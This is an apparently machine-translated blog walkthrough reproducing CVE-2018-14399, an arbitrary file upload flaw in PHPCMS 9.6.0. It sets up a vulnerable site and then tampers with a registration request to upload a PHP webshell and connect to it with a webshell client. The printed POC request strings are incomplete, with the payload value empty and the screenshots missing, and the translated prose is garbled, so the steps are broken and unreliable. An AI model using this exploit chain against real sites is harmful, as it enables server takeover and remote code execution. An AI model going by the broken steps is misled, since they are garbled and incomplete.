phpcms v9.6.0 arbitrary file upload vulnerability (CVE-2018-14399)

phpcms v9.6.0 arbitrary file upload vulnerability (CVE-2018-14399)

First, Vulnerability Description

Loopholes PHPCMS 9.6.0 version libs / classes / attachment.class.php file, the vulnerability stems from PHPCMS program does not do the right check on the types of files while downloading remote / local files. Remote attacker could exploit this vulnerability to upload and execute arbitrary PHP code.

Second, the flaw affects versions

PHPCMS 9.6.0

Third, the vulnerability environment to build

1, download phpcms v9.6.0 official version Download:

2. Unzip the downloaded file, then the file into the root of the site phpstudy, the browser access, start the installation


3. Continue to click Next, in the “Select modules,” this link, select “clean installation PHPCMS V9”


4, and has been the next step in the “account settings” fill in this one database account and password and set the administrator password


5, and has been the next step, until the following interface, said surface is successfully installed


6, logon background, generated Home


Fourth, the vulnerability reproduction

1, browser access to the front desk, a registered member


2. Click on the registration page, capture


3, in another system (kali), open web services, and create a txt file in the web root directory, write the following information


4, construction POC

siteid=1&modelid=11&username=test2&password=test2123&[email protected]&info[content]=&dosubmit=1&protocol=

5, modify the contents of packet capture, add POC


6, you can see the contents of the package that contains the return path to the file upload


7, browser access


8, construction POC, upload sentence

POC content:

siteid=1&modelid=11&username=testa&password=testa123&[email protected]&info[content]=&dosubmit=1&protocol=

9, modify packets, add POC, note: Each time we go to modify the test in the repeater in the username, password and email field values, guarantee can not be repeated.


10, you can see the contents of the package that contains the return path to the file upload


11, knives connection



Leave a Reply